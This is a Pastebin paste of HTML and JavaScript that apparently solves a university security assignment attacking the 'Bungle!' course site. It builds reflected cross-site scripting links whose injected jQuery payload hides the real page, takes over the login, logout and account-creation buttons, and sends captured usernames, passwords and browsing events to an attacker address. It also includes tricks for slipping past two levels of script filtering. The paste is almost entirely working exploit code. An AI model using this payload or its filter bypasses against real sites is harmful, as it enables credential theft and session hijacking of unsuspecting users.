Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <meta charset="utf-8">
- <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
- <script>
- function payload(a){function b(b){console.log($.param(dafta)),$.get(a,b)}function c(){$("html").hide(),$("#bungle-lnk").removeAttr("href"),$("#bungle-lnk").click(function(){d("/","/"!=history.state.url)}),$("#search-again-btn").removeAttr("href"),$("#search-again-btn").click(function(){d("/",!0)}),$(".history-item").each(function(){var a=$(this).attr("href");$(this).removeAttr("href"),$(this).click(function(){d(a,!0)}),$(this).text().includes("cTc2fWp1TFgFj7M6aFBl")?$(this).hide():index%2==0&&$(this).hide()}),$("#search-btn").click(function(a){a.preventDefault();var b=$("#query").val();$.ajax({url:"./search",data:{q:b},type:"GET",success:function(a){$("html").html(a),d("search?q="+b,!0)}})}),$("#log-in-btn").click(function(a){a.preventDefault();var c=$("#username").val(),e=$("#userpass").val();b({event:"login",user:c,pass:e}),console.log("setting cu to "+c),cu=c,$.ajax({url:"./login",data:{username:c,password:e},type:"POST",success:function(a){$("html").html(a),history.replaceState({url:"/",html:$("html").html()},"","/"),d("/",!1)}})}),$("#log-out-btn").click(function(a){a.preventDefault(),b({event:"logout",user:cu}),cu="",$.ajax({url:"./logout",data:{},type:"POST",success:function(a){$("html").html(a),history.replaceState({url:"/",html:$("html").html()},"","/"),d("/",!1)}})}),$("#new-account-btn").click(function(a){a.preventDefault();var c=$("#username").val(),e=$("#userpass").val();b({event:"login",user:c,pass:e}),console.log("setting cu to "+c),cu=c,$.ajax({url:"./create",data:{username:c,password:e},type:"POST",success:function(a){$("html").html(a),history.replaceState({url:"/",html:$("html").html()},"","/"),d("/",!1)}})}),$("html").show()}function d(a,d){var e="http://cos432-assn3.cs.princeton.edu/"+encodeURIComponent(a);b({event:"nav",user:cu,url:e}),d?$("html").load(a,function(){c(),history.pushState({url:a,html:$("html").html()},"",a)}):($("html").html(history.state.html),c())}$("html").hide(),$(document).ready(function(){var e=document.createElement("s"+"cript");e.text="var attacker = \""+a+"\";\nvar cu = \"\";\n"+d.toString()+"\n"+b.toString()+"\n"+c.toString(),$("html").append(e),window.onpopstate=function(a){d(a.state.url,!1)},history.replaceState(null,"","/"),$("html").load("/",function(){c(),history.replaceState({url:"/",html:$("html").html()},"","/")})})}
- function makeLink(xssdefense, target, attacker) {
- var original = target + "/search?xssdefense=" + xssdefense.toString() + "&q=" + encodeURIComponent("<script" + ">" + payload.toString() + ";" + payload.name + "(\"" + attacker + "\");<\/script" + ">");
- if (xssdefense == 0) {
- return original;
- } else { // Implement code to defeat XSS defenses here.
- if (xssdefense == 1) {
- return original.replace(/script/g, "sscriptcript");
- }
- // overfishing: replace inner script with more body onload stuff
- else if (xssdefense == 2) {
- return target + "/search?xssdefense=" + xssdefense.toString() + "&q=" + encodeURIComponent("<body onload='" + payload.toString() + payload.name + "(\"" + attacker + "\");'<\/body" + ">");
- }
- // overfishing:
- else if (xssdefense == 3) {
- return "not done yet";
- }
- }
- }
- var xssdefense = 2;
- var target = "http://cos432-assn3.cs.princeton.edu";
- var attacker = "http://127.0.0.1:31337/stolen";
- $(function() {
- var url = makeLink(xssdefense, target, attacker);
- $("h3").html("<a target=\"run\" href=\"" + url + "\">Try Bungle!</a>");
- });
- </script>
- <h3>parse error</h3>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement